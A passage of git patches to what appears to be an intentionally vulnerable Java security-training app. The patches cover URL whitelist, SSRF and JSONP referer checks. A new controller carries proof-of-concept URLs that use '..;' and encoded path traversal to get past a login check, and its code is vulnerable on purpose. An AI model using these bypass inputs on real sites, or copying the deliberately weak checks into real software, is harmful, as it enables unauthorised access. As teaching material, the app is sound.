                 response.setStatus(HttpServletResponse.SC_FORBIDDEN);
diff --git a/src/main/java/org/joychou/security/CustomCorsProcessor.java b/src/main/java/org/joychou/security/CustomCorsProcessor.java
index 45e0451a..cbbad17a 100644
--- a/src/main/java/org/joychou/security/CustomCorsProcessor.java
+++ b/src/main/java/org/joychou/security/CustomCorsProcessor.java
@@ -29,26 +29,21 @@ protected String checkOrigin(CorsConfiguration config, String requestOrigin) {
         if (result != null) {
             return result;
         }
-
-        List<String> allowedOrigins = config.getAllowedOrigins();
-        if (StringUtils.isBlank(requestOrigin)
-                || CollectionUtils.isEmpty(allowedOrigins)) {
+        // List<String> allowedOrigins = config.getAllowedOrigins();
+        if (StringUtils.isBlank(requestOrigin)) {
             return null;
         }
 
-        return customCheckOrigin(allowedOrigins, requestOrigin);
+        return customCheckOrigin(requestOrigin);
     }
 
 
     /**
-     * 用host的endsWith来校验requestOrigin
+     * 校验requestOrigin
      */
-    private String customCheckOrigin(List<String> allowedOrigins, String requestOrigin) {
-
-        // list转String[]
-        String[] arrayAllowOrigins = allowedOrigins.toArray(new String[allowedOrigins.size()]);
+    private String customCheckOrigin(String requestOrigin) {
 
-        if ( SecurityUtil.checkURLbyEndsWith(requestOrigin, arrayAllowOrigins) != null) {
+        if ( SecurityUtil.checkURL(requestOrigin) != null) {
             logger.info("[+] Origin: "  + requestOrigin );
             return requestOrigin;
         }
diff --git a/src/main/java/org/joychou/security/SecurityUtil.java b/src/main/java/org/joychou/security/SecurityUtil.java
index bb154dc4..aca374da 100644
--- a/src/main/java/org/joychou/security/SecurityUtil.java
+++ b/src/main/java/org/joychou/security/SecurityUtil.java
@@ -1,79 +1,51 @@
 package org.joychou.security;
 
-import com.google.common.net.InternetDomainName;
+import org.joychou.config.WebConfig;
 import org.slf4j.Logger;
 import org.slf4j.LoggerFactory;
 
 import java.io.UnsupportedEncodingException;
 import java.net.URI;
 import java.net.URLDecoder;
+import java.util.ArrayList;
 import java.util.regex.Pattern;
 
+
 public class SecurityUtil {
 
     private static final Pattern FILTER_PATTERN = Pattern.compile("^[a-zA-Z0-9_/\\.-]+$") ;
     private static Logger logger = LoggerFactory.getLogger(SecurityUtil.class);
 
-
     /**
-     * 通过endsWith判断URL是否合法
+     * 同时支持一级域名和多级域名，相关配置在resources目录下url/safe_domain.xml文件
      *
-     * @param url 需要check的url
-     * @param urlwhitelist url白名单list
-     * @return 安全url返回url，危险url返回null
+     * @param url the url need to check
+     * @return Safe url returns original url; Illegal url returns null;
      */
-    public static String checkURLbyEndsWith(String url, String[] urlwhitelist) {
-        if (null == url) {
+    public static String checkURL(String url) {
+
+        if (null == url){
             return null;
         }
+
+        ArrayList<String> safeDomains = WebConfig.getSafeDomains();
         try {
             URI uri = new URI(url);
-
-            if (!url.startsWith("http://") && !url.startsWith("https://")) {
-                return null;
-            }
-
             String host = uri.getHost().toLowerCase();
-            for (String whitelist: urlwhitelist){
-                if (host.endsWith("." + whitelist)) {
-                    return url;
-                }
-            }
-
-            return null;
-        } catch (Exception e) {
-            logger.error(e.toString());
-            return null;
-        }
-    }
-
-    /**
-     * 通过google guava判断URL是否合法。默认认为localhost合法
-     *
-     * @param url 需要check的url
-     * @param urlwhitelist 根域名白名单
-     * @return 安全url返回url，危险url返回null
-     */
-    public static String checkUrlByGuava(String url, String[] urlwhitelist){
-        final String localhost = "localhost";
 
-        if (null == url) {
-            return null;
-        }
-
-        try {
-            URI u = new URI(url);
+            // 必须http/https
             if (!url.startsWith("http://") && !url.startsWith("https://")) {
                 return null;
             }
-            String host = u.getHost().toLowerCase();
-            if (localhost.equals(host)) {
+
+            // 支持多级域名
+            if (safeDomains.contains(host)){
                 return url;
             }
-            String rootDomain = InternetDomainName.from(host).topPrivateDomain().toString();
 
-            for (String whiteurl: urlwhitelist){
-                if (rootDomain.equals(whiteurl)) {
+            // 支持一级域名
+            for(String safedomain: safeDomains) {
+                if(host.endsWith("." + safedomain)) {
                     return url;
                 }
             }
@@ -114,8 +86,8 @@ public static boolean checkSSRFWithoutRedirect(String url) {
      * @param hostWlist host whitelist
      * @return Safe url returns url. Dangerous url returns null.
      */
-    public static String checkSSRFByHostWlist(String url, String[] hostWlist) {
-        return checkURLbyEndsWith(url, hostWlist);
+    public static String checkSSRFByHost(String url) {
+        return checkURL(url);
     }
 
     /**
@@ -199,7 +171,6 @@ else if(ch == '/' || ch == '.' || ch == '-'){
     }
 
     public static void main(String[] args) {
-        System.out.print(replaceSpecialStr("text/ html&(&(asdf"));
     }
 
 }
\ No newline at end of file
diff --git a/src/main/resources/url/safe_domain.xml b/src/main/resources/url/safe_domain.xml
new file mode 100644
index 00000000..a403a675
--- /dev/null
+++ b/src/main/resources/url/safe_domain.xml
@@ -0,0 +1,7 @@
+<?xml version="1.0" encoding="UTF-8"?>
+
+<safedomain>
+    <!-- 支持一级域名或多级域名 -->
+    <domain>joychou.com</domain>
+    <domain>test.joychou.org</domain>
+</safedomain>

From 89cb9d8b52204261a009e1257a96d3f070c51cf0 Mon Sep 17 00:00:00 2001
From: JoyChou <viarus@qq.com>
Date: Tue, 31 Mar 2020 17:52:06 +0800
Subject: [PATCH 074/108] fix #13

---
 .../org/joychou/config/SafeDomainConfig.java  |   5 +-
 .../org/joychou/config/SafeDomainParser.java  |  98 +++++++++++++++--
 .../java/org/joychou/config/WebConfig.java    |  54 +++++++---
 .../org/joychou/controller/GetRequestURI.java |  50 +++++++++
 .../java/org/joychou/controller/SSRF.java     |   4 +-
 .../joychou/controller/jsonp/JSONPAdvice.java |  89 ++++++++++++++-
 .../java/org/joychou/filter/JsonpFilter.java  | 101 ------------------
 .../java/org/joychou/filter/ReferFilter.java  |   1 +
 .../joychou/interceptor/JsonpInterceptor.java |  40 +++++++
 .../org/joychou/security/SSRFChecker.java     |  41 ++++++-
 .../org/joychou/security/SecurityUtil.java    |  61 ++++++++---
 .../joychou/security/WebSecurityConfig.java   |   3 +-
 src/main/resources/application.properties     |   1 -
 src/main/resources/banner.txt                 |   6 ++
 src/main/resources/url/safe_domain.xml        |   7 --
 src/main/resources/url/ssrf_safe_domain.xml   |  22 ++++
 src/main/resources/url/url_safe_domain.xml    |  18 ++++
 17 files changed, 439 insertions(+), 162 deletions(-)
 create mode 100644 src/main/java/org/joychou/controller/GetRequestURI.java
 delete mode 100644 src/main/java/org/joychou/filter/JsonpFilter.java
 create mode 100644 src/main/java/org/joychou/interceptor/JsonpInterceptor.java
 create mode 100644 src/main/resources/banner.txt
 delete mode 100644 src/main/resources/url/safe_domain.xml
 create mode 100644 src/main/resources/url/ssrf_safe_domain.xml
 create mode 100644 src/main/resources/url/url_safe_domain.xml

diff --git a/src/main/java/org/joychou/config/SafeDomainConfig.java b/src/main/java/org/joychou/config/SafeDomainConfig.java
index d0fb91a7..de2d0bd7 100644
--- a/src/main/java/org/joychou/config/SafeDomainConfig.java
+++ b/src/main/java/org/joychou/config/SafeDomainConfig.java
@@ -7,14 +7,14 @@
 
 
 /**
- * 为了不要每次调用都解析safedomain的xml，所以将解析动作放在bean里。
+ * 为了不要每次调用都解析safedomain的xml，所以将解析动作放在Bean里。
  */
 @Configuration
 public class SafeDomainConfig {
 
     private static final Logger LOGGER = LoggerFactory.getLogger(SafeDomainConfig.class);
 
-    @Bean
+    @Bean // @Bean代表将safeDomainParserf方法返回的对象装配到SpringIOC容器中
     public SafeDomainParser safeDomainParser() {
         try {
             LOGGER.info("SafeDomainParser bean inject successfully!!!");
@@ -26,3 +26,4 @@ public SafeDomainParser safeDomainParser() {
     }
 
 }
+
diff --git a/src/main/java/org/joychou/config/SafeDomainParser.java b/src/main/java/org/joychou/config/SafeDomainParser.java
index 8c21e598..82859444 100644
--- a/src/main/java/org/joychou/config/SafeDomainParser.java
+++ b/src/main/java/org/joychou/config/SafeDomainParser.java
@@ -18,10 +18,13 @@ public class SafeDomainParser {
 
     public SafeDomainParser(){
 
-        String safeTag = "safedomain";
-        String domainSafeTag = "domain";
-        String safeDomainClassPath = "url" + File.separator + "safe_domain.xml";
+        String rootTag = "domains";
+        String safeDomainTag = "safedomains";
+        String blockDomainTag = "blockdomains";
+        String finalTag = "domain";
+        String safeDomainClassPath = "url" + File.separator + "url_safe_domain.xml";
         ArrayList<String> safeDomains = new ArrayList<>();
+        ArrayList<String> blockDomains = new ArrayList<>();
 
         try {
             // 读取resources目录下的文件
@@ -32,23 +35,104 @@ public SafeDomainParser(){
             DocumentBuilder db = dbf.newDocumentBuilder();
             Document doc = db.parse(file);  // parse xml
 
-            NodeList rootNode = doc.getElementsByTagName(safeTag);
+            NodeList rootNode = doc.getElementsByTagName(rootTag);  // 解析根节点domains
             Node domainsNode = rootNode.item(0);
             NodeList child = domainsNode.getChildNodes();
             
             for (int i = 0; i < child.getLength(); i++){
                 Node node = child.item(i);
-                if (node.getNodeName().equals(domainSafeTag)) {
-                    safeDomains.add(node.getTextContent());
+                // 解析safeDomains节点
+                if (node.getNodeName().equals(safeDomainTag)) {
+                    NodeList tagChild = node.getChildNodes();
+                    for (int j = 0; j < tagChild.getLength(); j++) {
+                        Node finalTagNode = tagChild.item(j);
+                        // 解析safeDomains节点里的domain节点
+                        if (finalTagNode.getNodeName().equals(finalTag)) {
+                            safeDomains.add(finalTagNode.getTextContent());
+                        }
+                    }
+                }else if (node.getNodeName().equals(blockDomainTag)) {
+                    NodeList finalTagNode = node.getChildNodes();
+                    for (int j = 0; j < finalTagNode.getLength(); j++) {
+                        Node tagNode = finalTagNode.item(j);
+                        // 解析blockDomains节点里的domain节点
+                        if (tagNode.getNodeName().equals(finalTag)) {
+                            blockDomains.add(tagNode.getTextContent());
+                        }
+                    }
                 }
             }
-
         }catch (Exception e){
             logger.error(e.toString());
         }
 
         WebConfig wc = new WebConfig();
         wc.setSafeDomains(safeDomains);
+        wc.setBlockDomains(blockDomains);
+
+        // 解析SSRF配置
+        String ssrfRootTag = "ssrfsafeconfig";
+        String ssrfSafeDomainTag = "safedomains";
+        String ssrfBlockDomainTag = "blockdomains";
+        String ssrfBlockIpsTag = "blockips";
+        String ssrfFinalTag = "domain";
+        String ssrfIpFinalTag = "ip";
+        String ssrfSafeDomainClassPath = "url" + File.separator + "ssrf_safe_domain.xml";
+
+        ArrayList<String> ssrfSafeDomains = new ArrayList<>();
+        ArrayList<String> ssrfBlockDomains = new ArrayList<>();
+        ArrayList<String> ssrfBlockIps = new ArrayList<>();
+
+        try {
+            // 读取resources目录下的文件
+            ClassPathResource resource = new ClassPathResource(ssrfSafeDomainClassPath);
+            File file = resource.getFile();
+
+            DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
+            DocumentBuilder db = dbf.newDocumentBuilder();
+            Document doc = db.parse(file);  // parse xml
+
+            NodeList rootNode = doc.getElementsByTagName(ssrfRootTag);  // 解析根节点
+            Node domainsNode = rootNode.item(0);
+            NodeList child = domainsNode.getChildNodes();
+
+            for (int i = 0; i < child.getLength(); i++){
+                Node node = child.item(i);
+                // 解析safeDomains节点
+                if (node.getNodeName().equals(ssrfSafeDomainTag)) {
+                    NodeList tagChild = node.getChildNodes();
+                    for (int j = 0; j < tagChild.getLength(); j++) {
+                        Node tagFinalNode = tagChild.item(j);
+                        if (tagFinalNode.getNodeName().equals(ssrfFinalTag)) {
+                            ssrfSafeDomains.add(tagFinalNode.getTextContent());
+                        }
+                    }
+                }else if (node.getNodeName().equals(ssrfBlockDomainTag)) {
+                    NodeList tagChild = node.getChildNodes();
+                    for (int j = 0; j < tagChild.getLength(); j++) {
+                        Node tagFinalNode = tagChild.item(j);
+                        if (tagFinalNode.getNodeName().equals(ssrfFinalTag)) {
+                            ssrfBlockDomains.add(tagFinalNode.getTextContent());
+                        }
+                    }
+                }else if(node.getNodeName().equals(ssrfBlockIpsTag)){
+                    NodeList tagChild = node.getChildNodes();
+                    for (int j = 0; j < tagChild.getLength(); j++) {
+                        Node tagFinalNode = tagChild.item(j);
+                        // 解析 blockIps 节点里的 ip 节点
+                        if (tagFinalNode.getNodeName().equals(ssrfIpFinalTag)) {
+                            ssrfBlockIps.add(tagFinalNode.getTextContent());
+                        }
+                    }
+                }
+            }
+        }catch (Exception e){
+            logger.error(e.toString());
+        }
+
+        wc.setSsrfBlockDomains(ssrfBlockDomains);
+        wc.setSsrfBlockIps(ssrfBlockIps);
+        wc.setSsrfSafeDomains(ssrfSafeDomains);
     }
 }
 
diff --git a/src/main/java/org/joychou/config/WebConfig.java b/src/main/java/org/joychou/config/WebConfig.java
index 7eb3290a..2dfdee19 100644
--- a/src/main/java/org/joychou/config/WebConfig.java
+++ b/src/main/java/org/joychou/config/WebConfig.java
@@ -11,7 +11,7 @@
  *
  * @author JoyChou @2019-07-24
  */
-@Component
+@Component // 注解@Component表明WebConfig类将被SpringIoC容器扫描装配，并且Bean名称为webConfig
 public class WebConfig {
 
     private static String[] callbacks;
@@ -22,7 +22,10 @@ public class WebConfig {
     private static Boolean referSecEnabled = false;
     private static String businessCallback;
     private static ArrayList<String> safeDomains= new ArrayList<>();
-
+    private static ArrayList<String> blockDomains= new ArrayList<>();
+    private static ArrayList<String> ssrfSafeDomains = new ArrayList<>();
+    private static ArrayList<String> ssrfBlockDomains= new ArrayList<>();
+    private static ArrayList<String> ssrfBlockIps = new ArrayList<>();
     /**
      * application.properties里object自动转jsonp的referer校验开关
      * @param jsonpReferCheckEnabled jsonp校验开关
@@ -45,19 +48,6 @@ public static String[] getJsonpCallbacks(){
     }
 
 
-    /**
-     * application.properties里object自动转jsonp的referer白名单域名
-     * @param jsonpRefererHost 白名单域名，仅支持一级域名
-     */
-    @Value("${joychou.security.jsonp.referer.host}")
-    public void setJsonpReferWhitelist(String[] jsonpRefererHost){
-        WebConfig.jsonpRefererHost = jsonpRefererHost;
-    }
-    public static String[] getJsonpReferWhitelist(){
-        return jsonpRefererHost;
-    }
-
-
     @Value("${joychou.security.referer.enabled}")
     public void setReferSecEnabled(Boolean referSecEnabled){
         WebConfig.referSecEnabled = referSecEnabled;
@@ -95,10 +85,42 @@ public static String getBusinessCallback(){
     }
 
 
-    public void setSafeDomains(ArrayList<String> safeDomains){
+    void setSafeDomains(ArrayList<String> safeDomains){
         WebConfig.safeDomains = safeDomains;
     }
     public static ArrayList<String> getSafeDomains(){
         return safeDomains;
     }
+
+
+    void setBlockDomains(ArrayList<String> blockDomains){
+        WebConfig.blockDomains = blockDomains;
+    }
+    public static ArrayList<String> getBlockDomains(){
+        return blockDomains;
+    }
+
+
+    void setSsrfSafeDomains(ArrayList<String> ssrfSafeDomains){
+        WebConfig.ssrfSafeDomains = ssrfSafeDomains;
+    }
+    public static ArrayList<String> getSsrfSafeDomains(){
+        return ssrfSafeDomains;
+    }
+
+
+    void setSsrfBlockDomains(ArrayList<String> ssrfBlockDomains){
+        WebConfig.ssrfBlockDomains = ssrfBlockDomains;
+    }
+    public static ArrayList<String> getSsrfBlockDomainsDomains(){
+        return ssrfBlockDomains;
+    }
+
+
+    void setSsrfBlockIps(ArrayList<String> ssrfBlockIps){
+        WebConfig.ssrfBlockIps = ssrfBlockIps;
+    }
+    public static ArrayList<String> getSsrfBlockIps(){
+        return ssrfBlockIps;
+    }
 }
\ No newline at end of file
diff --git a/src/main/java/org/joychou/controller/GetRequestURI.java b/src/main/java/org/joychou/controller/GetRequestURI.java
new file mode 100644
index 00000000..512dc1ae
--- /dev/null
+++ b/src/main/java/org/joychou/controller/GetRequestURI.java
@@ -0,0 +1,50 @@
+package org.joychou.controller;
+
+
+import org.slf4j.Logger;
+import org.slf4j.LoggerFactory;
+import org.springframework.util.AntPathMatcher;
+import org.springframework.util.PathMatcher;
+import org.springframework.web.bind.annotation.RequestMapping;
+import org.springframework.web.bind.annotation.RestController;
+
+import javax.servlet.http.HttpServletRequest;
+
+/**
+ * The difference between getRequestURI and getServletPath.
+ * 由于Spring Security的<code>antMatchers("/css/**", "/js/**")</code>未使用getRequestURI，所以登录不会被绕过。
+ *
+ * Details: https://joychou.org/web/security-of-getRequestURI.html
+ *
+ * Poc:
+ *   http://localhost:8080/css/%2e%2e/exclued/vuln
+ *   http://localhost:8080/css/..;/exclued/vuln
+ *   http://localhost:8080/css/..;bypasswaf/exclued/vuln
+ *
+ * @author JoyChou @2020-03-28
+ */
+
+@RestController
+@RequestMapping("uri")
+public class GetRequestURI {
+
+    private final Logger logger= LoggerFactory.getLogger(this.getClass());
+
+    @RequestMapping(value = "/exclued/vuln")
+    public String exclued(HttpServletRequest request) {
+
+        String[] excluedPath = {"/css/**", "/js/**"};
+        String uri = request.getRequestURI(); // Security: request.getServletPath()
+        PathMatcher matcher = new AntPathMatcher();
+
+        logger.info("getRequestURI: " + uri);
+        logger.info("getServletPath: " + request.getServletPath());
+
+        for (String path: excluedPath) {
+            if ( matcher.match (path, uri) ) {
+                 return "You have bypassed the login page.";
+            }
+        }
+        return "This is a login page >..<";
+    }
+}
diff --git a/src/main/java/org/joychou/controller/SSRF.java b/src/main/java/org/joychou/controller/SSRF.java
index ec6dfc54..5b74049e 100644
--- a/src/main/java/org/joychou/controller/SSRF.java
+++ b/src/main/java/org/joychou/controller/SSRF.java
@@ -197,7 +197,7 @@ public static String ssrf_HttpClient(@RequestParam String url) {
     @RequestMapping("/commonsHttpClient/sec")
     @ResponseBody
     public static String commonsHttpClient(@RequestParam String url) {
-        if (!SecurityUtil.checkSSRFWithoutRedirect(url)) {
+        if (!SecurityUtil.checkSSRFByWhitehosts(url)) {
             return "Bad man. I got u.";
         }
 
@@ -285,7 +285,7 @@ public static String IOUtils(@RequestParam String url) {
     public static String ImageIOSec(@RequestParam String url) {
         try {
             URL u = new URL(url);
-            if (!SecurityUtil.checkSSRF(url)) {
+            if (!SecurityUtil.checkSSRFWithoutRedirect(url)) {
                 logger.error("[-] SSRF check failed. Original Url: "+ url);
                 return "SSRF check failed.";
             }
diff --git a/src/main/java/org/joychou/controller/jsonp/JSONPAdvice.java b/src/main/java/org/joychou/controller/jsonp/JSONPAdvice.java
index 5463a5a5..944a325b 100644
--- a/src/main/java/org/joychou/controller/jsonp/JSONPAdvice.java
+++ b/src/main/java/org/joychou/controller/jsonp/JSONPAdvice.java
@@ -1,18 +1,97 @@
 package org.joychou.controller.jsonp;
 
+import org.apache.commons.lang.StringUtils;
+import org.joychou.config.WebConfig;
+import org.joychou.security.SecurityUtil;
+import org.slf4j.Logger;
+import org.slf4j.LoggerFactory;
 import org.springframework.beans.factory.annotation.Value;
+import org.springframework.core.MethodParameter;
+import org.springframework.http.MediaType;
+import org.springframework.http.converter.json.MappingJacksonValue;
+import org.springframework.http.server.ServerHttpRequest;
+import org.springframework.http.server.ServerHttpResponse;
+import org.springframework.http.server.ServletServerHttpRequest;
+import org.springframework.http.server.ServletServerHttpResponse;
 import org.springframework.web.bind.annotation.ControllerAdvice;
 import org.springframework.web.servlet.mvc.method.annotation.AbstractJsonpResponseBodyAdvice;
 
-// AbstractJsonpResponseBodyAdvice will be removed as of Spring Framework 5.1, use CORS instead.
-// Since Spring Framework 4.1
-// Springboot 2.1.0 RELEASE use spring framework 5.1.2
+import javax.servlet.http.HttpServletRequest;
+import javax.servlet.http.HttpServletResponse;
+
+
+/**
+ * <code>AbstractJsonpResponseBodyAdvice</code> will be removed as of Spring Framework 5.1, use CORS instead.
+ * Since Spring Framework 4.1. Springboot 2.1.0 RELEASE use spring framework 5.1.2
+ */
 @ControllerAdvice
 public class JSONPAdvice extends AbstractJsonpResponseBodyAdvice {
 
+    private final String[] callbacks;
+    private final Logger logger= LoggerFactory.getLogger(this.getClass());
+
+
     // method of using @Value in constructor
-    public JSONPAdvice(@Value("${joychou.security.jsonp.callback}") String[] callback) {
-        super(callback);  // Can set multiple paramNames
+    public JSONPAdvice(@Value("${joychou.security.jsonp.callback}") String[] callbacks) {
+        super(callbacks);  // Can set multiple paramNames
+        this.callbacks = callbacks;
+    }
+
+
+    // Check referer
+    @Override
+    protected void beforeBodyWriteInternal(MappingJacksonValue bodyContainer, MediaType contentType,
+                                           MethodParameter returnType, ServerHttpRequest req,
+                                           ServerHttpResponse res) {
+
+        HttpServletRequest request = ((ServletServerHttpRequest)req).getServletRequest();
+        HttpServletResponse response = ((ServletServerHttpResponse)res).getServletResponse();
+
+        String realJsonpFunc = getRealJsonpFunc(request);
+        if (StringUtils.isNotBlank(realJsonpFunc)){
+            jsonpReferHandler(request, response);
+        }
+        super.beforeBodyWriteInternal(bodyContainer, contentType, returnType, req, res);
     }
 
+    /**
+     * @return 获取实际jsonp的callback
+     */
+    private String getRealJsonpFunc(HttpServletRequest req) {
+
+        String reqCallback = null;
+        for (String callback: this.callbacks) {
+            reqCallback = req.getParameter(callback);
+            if(StringUtils.isNotBlank(reqCallback)) {
+                break;
+            }
+        }
+        return reqCallback;
+    }
+
+    // 校验Jsonp的Referer
+    private void jsonpReferHandler(HttpServletRequest request, HttpServletResponse response) {
+
+        String refer = request.getHeader("referer");
+        String url = request.getRequestURL().toString();
+        String query = request.getQueryString();
+
+        // 如果jsonp校验的开关为false，不校验
+        if ( !WebConfig.getJsonpReferCheckEnabled() ) {
+            return;
+        }
+
+        // 校验jsonp逻辑，如果不安全，返回forbidden
+        if (SecurityUtil.checkURL(refer) == null ){
+            logger.error("[-] URL: " + url + "?" + query + "\t" + "Referer: " + refer);
+            try{
+                response.setStatus(HttpServletResponse.SC_FORBIDDEN);
+                response.getWriter().write("forbidden");
+                response.flushBuffer();
+            } catch (Exception e){
+                logger.error(e.toString());
+            }
+
+        }
+    }
 }
diff --git a/src/main/java/org/joychou/filter/JsonpFilter.java b/src/main/java/org/joychou/filter/JsonpFilter.java
deleted file mode 100644
index 7c16d9d2..00000000
--- a/src/main/java/org/joychou/filter/JsonpFilter.java
+++ /dev/null
@@ -1,101 +0,0 @@
-package org.joychou.filter;
-
-
-import javax.servlet.*;
-import javax.servlet.annotation.WebFilter;
-import javax.servlet.http.HttpServletRequest;
-import javax.servlet.http.HttpServletResponse;
-import java.io.IOException;
-
-import org.apache.commons.lang.StringUtils;
-import org.joychou.config.WebConfig;
-import org.joychou.security.SecurityUtil;
-import org.slf4j.Logger;
-import org.slf4j.LoggerFactory;
-
-
-/**
- * @author JoyChou @ 2020-01-13
- * 专门为object自动转jsonp功能配置的filter
- */
-
-@WebFilter(filterName = "jsonpFilter", urlPatterns = "/*")
-public class JsonpFilter implements Filter {
-
-
-    @Override
-    public void init(FilterConfig filterConfig) throws ServletException {
-
-    }
-
-    private final Logger logger= LoggerFactory.getLogger(this.getClass());
-
-
-    @Override
-    public void doFilter(ServletRequest req, ServletResponse res, FilterChain filterChain)
-            throws IOException, ServletException {
-
-        HttpServletRequest request = (HttpServletRequest) req;
-        HttpServletResponse response = (HttpServletResponse) res;
-
-        String refer = request.getHeader("referer");
-        StringBuffer url = request.getRequestURL();
-        String query = request.getQueryString();
-
-        // 如果不满足jsonp校验逻辑，则不校验
-        if ( !check(request) ) {
-            filterChain.doFilter(req, res);
-            return ;
-        }
-
-        // 校验jsonp逻辑，如果不安全，返回forbidden
-        if (SecurityUtil.checkURL(refer) == null ){
-            logger.error("[-] URL: " + url + "?" + query + "\t" + "Referer: " + refer);
-            response.setStatus(HttpServletResponse.SC_FORBIDDEN);
-            response.getWriter().write("forbidden");
-            response.flushBuffer();
-            return ;
-        }
-
-        // 正常的refer，继续业务逻辑。
-        filterChain.doFilter(req, res);
-
-    }
-
-    /**
-     *
-     * @return true要进行jsonp安全校验，false不进行jsonp安全校验
-     */
-    private boolean check(HttpServletRequest req) {
-
-        // 如果jsonp校验的开关为false，不校验
-        if ( !WebConfig.getJsonpReferCheckEnabled() ) {
-            return false;
-        }
-
-        // 只校验GET请求
-        if ( !"GET".equals(req.getMethod()) ) {
-            return false;
-        }
-
-        // 只校验带配置里的callback参数请求
-        String reqCallback = null;
-        for (String callback: WebConfig.getJsonpCallbacks()) {
-            reqCallback = req.getParameter(callback);
-            if(StringUtils.isNotBlank(reqCallback)) {
-                break;
-            }
-        }
-        if(StringUtils.isBlank(reqCallback)){
-            return false;
-        }
-
-
-        return true;
-
-    }
-    @Override
-    public void destroy() {
-
-    }
-}
diff --git a/src/main/java/org/joychou/filter/ReferFilter.java b/src/main/java/org/joychou/filter/ReferFilter.java
index f8803181..b2326f9f 100644
--- a/src/main/java/org/joychou/filter/ReferFilter.java
+++ b/src/main/java/org/joychou/filter/ReferFilter.java
@@ -42,6 +42,7 @@ public void doFilter(ServletRequest req, ServletResponse res, FilterChain filter
         PathMatcher matcher = new AntPathMatcher();
         boolean isMatch = false;
 
+        // 获取要校验Referer的Uri
         for (String uri: WebConfig.getReferUris()) {
             if ( matcher.match (uri, request.getRequestURI()) ) {
                 isMatch = true;
diff --git a/src/main/java/org/joychou/interceptor/JsonpInterceptor.java b/src/main/java/org/joychou/interceptor/JsonpInterceptor.java
new file mode 100644
index 00000000..52d67e4c
--- /dev/null
+++ b/src/main/java/org/joychou/interceptor/JsonpInterceptor.java
@@ -0,0 +1,40 @@
+package org.joychou.interceptor;
+
+import org.apache.commons.lang.StringUtils;
+import org.joychou.config.WebConfig;
+import org.slf4j.Logger;
+import org.slf4j.LoggerFactory;
+import org.springframework.web.servlet.HandlerInterceptor;
+import org.springframework.web.servlet.ModelAndView;
+
+import javax.servlet.http.HttpServletRequest;
+import javax.servlet.http.HttpServletResponse;
+
+/**
+ * @author JoyChou @ 2020-03-28
+ * 专门为object自动转jsonp功能配置的Referer校验Intercepter
+ */
+
+public class JsonpInterceptor implements HandlerInterceptor {
+
+    private final Logger logger= LoggerFactory.getLogger(this.getClass());
+
+    @Override
+    public boolean preHandle(HttpServletRequest request, HttpServletResponse response, Object handler)
+            throws Exception {
+        return true;
+    }
+
+    @Override
+    public void postHandle(HttpServletRequest request, HttpServletResponse response, Object handler,
+                           ModelAndView modelAndView) throws Exception {
+    }
+
+    @Override
+    public void afterCompletion(HttpServletRequest request, HttpServletResponse response, Object handler, Exception ex)
+            throws Exception {
+        logger.info(response.getWriter().toString());
+    }
+
+}
+
diff --git a/src/main/java/org/joychou/security/SSRFChecker.java b/src/main/java/org/joychou/security/SSRFChecker.java
index bb959a23..2f1bcf0a 100644
--- a/src/main/java/org/joychou/security/SSRFChecker.java
+++ b/src/main/java/org/joychou/security/SSRFChecker.java
@@ -4,7 +4,10 @@
 import java.net.InetAddress;
 import java.net.URI;
 import java.net.URL;
+import java.util.ArrayList;
+
 import org.apache.commons.net.util.SubnetUtils;
+import org.joychou.config.WebConfig;
 import org.slf4j.Logger;
 import org.slf4j.LoggerFactory;
 
@@ -12,6 +15,36 @@ class SSRFChecker {
 
     private static Logger logger = LoggerFactory.getLogger(SSRFChecker.class);
 
+    static boolean checkURLFckSSRF(String url) {
+        if (null == url){
+            return false;
+        }
+
+        ArrayList<String> ssrfSafeDomains = WebConfig.getSsrfSafeDomains();
+        try {
+            URI uri = new URI(url);
+            String host = uri.getHost().toLowerCase();
+
+            // 必须http/https
+            if (!url.startsWith("http://") && !url.startsWith("https://")) {
+                return false;
+            }
+
+            if (ssrfSafeDomains.contains(host)) {
+                return true;
+            }
+            for (String ssrfSafeDomain : ssrfSafeDomains) {
+                if(host.endsWith("." + ssrfSafeDomain)) {
+                    return true;
+                }
+            }
+        } catch (Exception e) {
+            logger.error(e.toString());
+            return false;
+        }
+        return false;
+    }
+
     /**
      * 解析url的ip，判断ip是否是内网ip，所以TTL设置为0的情况不适用。
      * url只允许https或者http，并且设置默认连接超时时间。
@@ -21,7 +54,7 @@ class SSRFChecker {
      * @param checkTimes 设置重定向检测的最大次数，建议设置为10次
      * @return 安全返回true，危险返回false
      */
-    static Boolean checkSSRF(String url, int checkTimes) {
+    static boolean checkSSRF(String url, int checkTimes) {
 
         HttpURLConnection connection;
         int connectTime = 5*1000;  // 设置连接超时时间5s
@@ -69,7 +102,7 @@ static Boolean checkSSRF(String url, int checkTimes) {
      *
      * @return 如果是内网IP，返回true；非内网IP，返回false。
      */
-     static Boolean isInnerIPByUrl(String url) {
+     static boolean isInnerIPByUrl(String url) {
         String host = url2host(url);
         if (host.equals("")) {
             return true; // 异常URL当成内网IP等非法URL处理
@@ -92,9 +125,9 @@ static Boolean isInnerIPByUrl(String url) {
      */
     private static boolean isInnerIp(String strIP){
 
-        String blackSubnetlist[] = {"10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "0.0.0.0/32"};
+        ArrayList<String> blackSubnets= WebConfig.getSsrfBlockIps();
 
-        for (String subnet: blackSubnetlist) {
+        for (String subnet: blackSubnets) {
             SubnetUtils utils = new SubnetUtils(subnet);
             if (utils.getInfo().isInRange(strIP)) {
                 logger.error("[-] SSRF check failed. Inner Ip: " + strIP);
diff --git a/src/main/java/org/joychou/security/SecurityUtil.java b/src/main/java/org/joychou/security/SecurityUtil.java
index aca374da..0c6cb757 100644
--- a/src/main/java/org/joychou/security/SecurityUtil.java
+++ b/src/main/java/org/joychou/security/SecurityUtil.java
@@ -13,11 +13,12 @@
 
 public class SecurityUtil {
 
-    private static final Pattern FILTER_PATTERN = Pattern.compile("^[a-zA-Z0-9_/\\.-]+$") ;
+    private static final Pattern FILTER_PATTERN = Pattern.compile("^[a-zA-Z0-9_/\\.-]+$");
     private static Logger logger = LoggerFactory.getLogger(SecurityUtil.class);
 
     /**
-     * 同时支持一级域名和多级域名，相关配置在resources目录下url/safe_domain.xml文件
+     * 同时支持一级域名和多级域名，相关配置在resources目录下url/safe_domain.xml文件。
+     * 优先判断黑名单，如果满足黑名单return null。
      *
      * @param url the url need to check
      * @return Safe url returns original url; Illegal url returns null;
@@ -29,6 +30,8 @@ public static String checkURL(String url) {
         }
 
         ArrayList<String> safeDomains = WebConfig.getSafeDomains();
+        ArrayList<String> blockDomains = WebConfig.getBlockDomains();
+
         try {
